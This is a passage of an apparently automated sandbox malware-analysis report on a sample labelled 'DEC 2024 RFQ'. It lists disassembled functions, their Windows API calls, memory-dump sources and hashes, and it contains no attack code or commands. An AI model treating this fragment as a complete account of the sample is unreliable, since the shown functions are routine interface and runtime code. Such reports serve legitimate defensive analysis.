                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0008D5EA
                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0008D67D
                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0008D691
                                                                                                                      • CoCreateInstance.OLE32(000B2D7C,00000000,00000001,000D8C1C,?), ref: 0008D6DD
                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0008D74C
                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 0008D7A4
                                                                                                                      • _memset.LIBCMT ref: 0008D7E1
                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0008D81D
                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0008D840
                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0008D847
                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0008D87E
                                                                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0008D880
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1246142700-0
                                                                                                                      • Opcode ID: 3a7d1d68155e837648f452b829b6f9cb2d36983f77168dbfce104e36dc593876
                                                                                                                      • Instruction ID: 588422b9d32aa3441294e0f49a08a40330766a7c38836abd7656d1fd718451d6
                                                                                                                      • Opcode Fuzzy Hash: 3a7d1d68155e837648f452b829b6f9cb2d36983f77168dbfce104e36dc593876
                                                                                                                      • Instruction Fuzzy Hash: CEB1EC75A00119AFDB04DFA4C888DAEBBF9FF49314F1485A9E949DB261DB30ED41CB50
                                                                                                                      Function 0007C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 0007C283
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0007C295
                                                                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0007C2F3
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 0007C2FE
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0007C310
                                                                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0007C364
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0007C372
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0007C383
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0007C3C6
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0007C3D4
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0007C3F1
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0007C3FE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3096461208-0
                                                                                                                      • Opcode ID: 6b8922353f0d8f855916892e2d87fc932c2c7af81a2f60954fe3818d758a6a13
                                                                                                                      • Instruction ID: 391dacafb518b32b2d57ce787031498b0f25f4576f1470e8047f0f8b29a73dbe
                                                                                                                      • Opcode Fuzzy Hash: 6b8922353f0d8f855916892e2d87fc932c2c7af81a2f60954fe3818d758a6a13
                                                                                                                      • Instruction Fuzzy Hash: 75514171B00605AFEB18CFA9DD89EBEBBB6EB88310F14812DF519D7290D7749D008B14
                                                                                                                      Function 0002201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00021B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00022036,?,00000000,?,?,?,?,000216CB,00000000,?), ref: 00021B9A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000220D3
                                                                                                                      • KillTimer.USER32(-00000001,?,?,?,?,000216CB,00000000,?,?,00021AE2,?,?), ref: 0002216E
                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0005BCA6
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000216CB,00000000,?,?,00021AE2,?,?), ref: 0005BCD7
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000216CB,00000000,?,?,00021AE2,?,?), ref: 0005BCEE
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000216CB,00000000,?,?,00021AE2,?,?), ref: 0005BD0A
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0005BD1C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 641708696-0
                                                                                                                      • Opcode ID: fee7c01317d9e11bc4e7e4d2d4796d8857701b58e4b220799713b02c893f88fb
                                                                                                                      • Instruction ID: b2a0d973f2a1564154287bc9d637fd11e138d7204ddad763255ec700e361c95e
                                                                                                                      • Opcode Fuzzy Hash: fee7c01317d9e11bc4e7e4d2d4796d8857701b58e4b220799713b02c893f88fb
                                                                                                                      • Instruction Fuzzy Hash: BC61C131100A61EFEB359F54EE88B2A77F1FF51707F104928E9826A571CB78A891DB50
                                                                                                                      Function 000221A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000225DB: GetWindowLongW.USER32(?,000000EB), ref: 000225EC
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 000221D3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ColorLongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 259745315-0
                                                                                                                      • Opcode ID: b8b6a8ff6e85b1a7e00ee5ddf5f9164a573fde4b11621fdaa58482e92a7a3f0d
                                                                                                                      • Instruction ID: ab432d3845c9644bd535c3ce8b52126f661febd19c6b8220aec2ee6832222849
                                                                                                                      • Opcode Fuzzy Hash: b8b6a8ff6e85b1a7e00ee5ddf5f9164a573fde4b11621fdaa58482e92a7a3f0d
                                                                                                                      • Instruction Fuzzy Hash: 4E41A431100550FFEB655FA8EC88BB93BA5EB06331F184365FE659A1E2C7368C46DB21
                                                                                                                      Function 0008A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?,000AF910), ref: 0008A90B
                                                                                                                      • GetDriveTypeW.KERNEL32(00000061,000D89A0,00000061), ref: 0008A9D5
                                                                                                                      • _wcscpy.LIBCMT ref: 0008A9FF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                      • API String ID: 2820617543-1000479233
                                                                                                                      • Opcode ID: 047e5fd2951bb2064835156aa3ff7fec652b08d568611a0cd7a45a6c1dda7b1f
                                                                                                                      • Instruction ID: 9183a910c18a894b75fe1c074556277da78e201539924a96c7ce1006912a498b
                                                                                                                      • Opcode Fuzzy Hash: 047e5fd2951bb2064835156aa3ff7fec652b08d568611a0cd7a45a6c1dda7b1f
                                                                                                                      • Instruction Fuzzy Hash: C351AC312083019BD714EF14D892AAFB7E5FF86310F14482EF5DA576A2DB319909CB93
                                                                                                                      Function 00029837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __i64tow__itow__swprintf
                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                      • API String ID: 421087845-2263619337
                                                                                                                      • Opcode ID: f9174954754d2d61800ca2964580bb334b4ab40151296abc98daee8e17d99849
                                                                                                                      • Instruction ID: 77e12d51331f01c938294822f6708958568f91b9a25a8fc8cd7e323100eb88f1
                                                                                                                      • Opcode Fuzzy Hash: f9174954754d2d61800ca2964580bb334b4ab40151296abc98daee8e17d99849
                                                                                                                      • Instruction Fuzzy Hash: AB41C771900616AFDB24DF34DC42EBA77E8FF45300F24447EEA49DB292EE35A9458B10
                                                                                                                      Function 000A7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 000A716A
                                                                                                                      • CreateMenu.USER32 ref: 000A7185
                                                                                                                      • SetMenu.USER32(?,00000000), ref: 000A7194
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000A7221
                                                                                                                      • IsMenu.USER32(?), ref: 000A7237
                                                                                                                      • CreatePopupMenu.USER32 ref: 000A7241
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000A726E
                                                                                                                      • DrawMenuBar.USER32 ref: 000A7276
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                      • String ID: 0$F
                                                                                                                      • API String ID: 176399719-3044882817
                                                                                                                      • Opcode ID: 3fd001b3682b9bfea3df20f743188109f81991b67a7d9b448342c737171019ac
                                                                                                                      • Instruction ID: 7befb6e5221362a9f4a7d907a67c5d6e15565c9b0f5beeeb37ac294c94d3b181
                                                                                                                      • Opcode Fuzzy Hash: 3fd001b3682b9bfea3df20f743188109f81991b67a7d9b448342c737171019ac
                                                                                                                      • Instruction Fuzzy Hash: 1C412574A01605EFEB20DFA4DD84BAA7BF5FB4A310F144428FA49A7361D735A910CB90
                                                                                                                      Function 000A74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 000A755E
                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 000A7565
                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 000A7578
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 000A7580
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 000A758B
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 000A7594
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 000A759E
                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 000A75B2
                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 000A75BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                      • Opcode ID: eacfef9c9a809bf063cdb7c10ef2705b682978113c75bbcd26c92a9c0f396125
                                                                                                                      • Instruction ID: d45b7d673d1fd9d0728b8dfe1eaa135963af705545e9d69672539f35bbf4357b
                                                                                                                      • Opcode Fuzzy Hash: eacfef9c9a809bf063cdb7c10ef2705b682978113c75bbcd26c92a9c0f396125
                                                                                                                      • Instruction Fuzzy Hash: 93316F32504615BBEF129FB4DC08FEB3BA9FF0A360F114224FA59960A1C775D811DBA4
                                                                                                                      Function 00046E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00046E3E
                                                                                                                        • Part of subcall function 00048B28: __getptd_noexit.LIBCMT ref: 00048B28
                                                                                                                      • __gmtime64_s.LIBCMT ref: 00046ED7
                                                                                                                      • __gmtime64_s.LIBCMT ref: 00046F0D
                                                                                                                      • __gmtime64_s.LIBCMT ref: 00046F2A
                                                                                                                      • __allrem.LIBCMT ref: 00046F80
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00046F9C
                                                                                                                      • __allrem.LIBCMT ref: 00046FB3
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00046FD1
                                                                                                                      • __allrem.LIBCMT ref: 00046FE8
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00047006
                                                                                                                      • __invoke_watson.LIBCMT ref: 00047077
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 384356119-0
                                                                                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                      • Instruction ID: 5d74dd6edc5dc58cfc5cdcc09d5897bf96724b0b9c3ab4c961aeafc7a22e6d3f
                                                                                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                      • Instruction Fuzzy Hash: 0E7126F2A00716EBD714AE69DC41BABB3E8AF01364F108639F814D7282F771DD448B95
                                                                                                                      Function 00082527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00082542
                                                                                                                      • GetMenuItemInfoW.USER32(000E5890,000000FF,00000000,00000030), ref: 000825A3
                                                                                                                      • SetMenuItemInfoW.USER32(000E5890,00000004,00000000,00000030), ref: 000825D9
                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 000825EB
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0008262F
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0008264B
                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00082675
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 000826BA
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00082700
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00082714
                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00082735
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4176008265-0
                                                                                                                      • Opcode ID: 6d89c901bbc820b47cdd66dab045974fff2eb1e7ce22ce0f9b22371c0c34b128
                                                                                                                      • Instruction ID: 8c0292d77b31e1cf6233d61a722085cb4668c7f15e18f8a069ef911db5c8a2f6
                                                                                                                      • Opcode Fuzzy Hash: 6d89c901bbc820b47cdd66dab045974fff2eb1e7ce22ce0f9b22371c0c34b128
                                                                                                                      • Instruction Fuzzy Hash: 0A61C27090464AAFEF21EFA4DD88DBE7BF8FB02304F140459E982A7251E735AD15DB21
                                                                                                                      Function 000A6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000A6FA5
                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 000A6FA8
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000A6FCC
                                                                                                                      • _memset.LIBCMT ref: 000A6FDD
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000A6FEF
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 000A7067
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 830647256-0
                                                                                                                      • Opcode ID: 1542a8801ec09f533e7237d6c314aff6c61224ed9f7215e340e0bbb4f6eef5af
                                                                                                                      • Instruction ID: eaa59843e7dfaba1816f8ad810ff06851db29f53e6137c063b997acaf6b650ee
                                                                                                                      • Opcode Fuzzy Hash: 1542a8801ec09f533e7237d6c314aff6c61224ed9f7215e340e0bbb4f6eef5af
                                                                                                                      • Instruction Fuzzy Hash: 45618C75900248EFDB10DFA8CC81EEE77F8EB0A714F144169FA14AB2A2C775AD41CB90
                                                                                                                      Function 00076B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00076BBF
                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00076C18
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00076C2A
                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00076C4A
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00076C9D
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00076CB1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00076CC6
                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00076CD3
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00076CDC
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00076CEE
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00076CF9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2706829360-0
                                                                                                                      • Opcode ID: 3fce8155f2203476b0af670500e9d77a2e3e01c0e20cde02500399005f3198f8
                                                                                                                      • Instruction ID: 277ef416005403f4fa78b5f59966aae1d348d754036c2ded82e70c590961fc2f
                                                                                                                      • Opcode Fuzzy Hash: 3fce8155f2203476b0af670500e9d77a2e3e01c0e20cde02500399005f3198f8
                                                                                                                      • Instruction Fuzzy Hash: 8A415135E005199FDF00DFA4D8449EEBBB9EF09350F00C069E956E7261DB35A945CB94
                                                                                                                      Function 000983BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
